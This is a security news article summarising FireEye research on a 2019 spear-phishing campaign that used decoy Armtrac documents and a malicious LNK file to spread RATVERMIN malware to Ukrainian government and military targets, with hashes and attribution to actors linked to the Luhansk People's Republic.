RatVermin Spyware Campaign: Ukraine Gov Agencies Targeted
A phishing campaign in which Ukraine government agencies are targeted with the RatVermin malware has been uncovered.
Security researchers working with FireEye Threat Intelligence have uncovered this ongoing spear phishing campaign that has been targeting the Ukraine government and military with emails that aim to distribute the RatVermin malware, which helps malicious actors in info-gathering activities.
FireEye’s Threat Intelligence research group researchers John Hultquist, Ben Read, Oleg Bondarenko and Chi-en Shen, in an analytical blog post dated April 16, 2019, say, “In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.”
The guess is that it’s cybercriminals associated with the so-called Luhansk People’s Republic, a proto-state in eastern Ukraine, who could be involved in the attack. The FireEye blog post observes, “This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014. The email is linked to activity that previously targeted the Ukrainian Government with RATVERMIN. Infrastructure analysis indicates the actors behind the intrusion activity may be associated with the so-called Luhansk People’s Republic (LPR).”
The FireEye researchers had spotted a sample email from the campaign, which was sent on January 22, 2019 and used the subject “SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD. The sender’s name, obviously fake, was given as Armtrac, a defense manufacturer in the U.K. The researchers explain, in their blog post, “The email included an attachment with the filename “Armtrac-Commercial.7z” (MD5: 982565e80981ce13c48e0147fb271fe5). This 7z package contained “Armtrac-Commercial.zip” (MD5: e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents and one malicious LNK file with a substituted icon”. This substituted Microsoft Word icon was obviously intended to trick the victim.
The group behind the campaign may have been active since at least 2014, according to the FireEye team. It was early in 2018 that the FireEye Threat Intelligence team reported activities about them for the first time. Then the group had carried out a campaign using standalone EXE or self-extracting RAR (SFX) files to infect victims, after which they gradually grew in sophistication, leveraging both custom and open-source malware. Their recent activities indicated increased sophistication by leveraging malicious LNK files. The group, which uses open-source QUASARRAT and the RATVERMIN malware, seem to be focussed on targeting Ukrainian entities, as suggested by the filenames and malware distribution data.
The blog post by the FireEye researchers points out, “This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR’s security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors. While this specific group is primarily a threat to Ukraine, nascent threats to Ukraine have previously become international concerns and bear monitoring.”
The server has been unreachable during analysis by the FireEye researchers. They found that the network infrastructure was linked to domains that were previously connected to the RatVermin remote access tool, which could perform malicious activities like capturing screenshots, audio etc.
Lindsey O’Donnell of Threatpost writes, “The researchers made a link to LPR because the domain used by the command-and-control (C2) server in the campaign was registered under the same email ([email protected][.]ru) as several other domains – including one for the official website of the Ministry of State Security of the Luhansk People’s Republic.”
The Threatpost report adds, “It’s not the first time the Ukraine government has been targeted by a cyberattack – in April 2018, for instance, the Ukrainian Energy Ministry was hit by a ransomware attack, in what researchers believed was the work of amateurs rather than cyber-espionage efforts. Other efforts however have shown more skill.”